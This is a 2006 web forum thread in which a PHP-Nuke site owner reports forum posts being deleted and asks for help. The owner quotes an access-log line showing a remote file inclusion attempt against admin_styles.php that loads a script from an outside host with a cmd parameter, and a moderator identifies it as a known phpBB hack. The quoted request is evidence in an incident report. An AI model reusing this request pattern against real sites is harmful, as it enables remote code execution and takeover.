Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
panda
Hangin' Around


Joined: May 09, 2004
Posts: 32

PostPosted: Mon Aug 28, 2006 11:50 am Reply with quote

Yesterday I was looking at my site and went away for 20 mins come back and 80% of my forum posts had been deleted, restored my DB with a backup and today at the same time they have started deleting again !!

I've checked my site logs and nothing really stands out bar this from the 17th

222.124.193.3 - - [17/Aug/2006:17:28:56 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.osmozcafe.com/agenda/admin/backup/b.txt?&cmd HTTP/1.0" 200 364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Check the scripting in the txt file at that site.

I am on normal 7.7 and bb2nuke 2.0.21

Any ideas ?

Thanks

Andy
 
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Aug 28, 2006 12:31 pm Reply with quote

That looks to be a known phpBB hack ... but as of yet, I've not duplicated it with 2.0.21.
If you can message me the login details on your site (FTP), I would like to see whether your site is indeed vulnerable and if we can determine how they are exploiting this

If you just want to stop it, Sentinel can do it. However they may possibly have installed other backdoors into your system

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
panda
PostPosted: Mon Aug 28, 2006 3:39 pm Reply with quote

Can they hack a whole site with this ?, cause they have Now !!
 
evaders99
PostPosted: Tue Aug 29, 2006 12:37 pm Reply with quote

Once they are in, yes they can install other things to allow them complete control.

You will need your host to help stop them
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©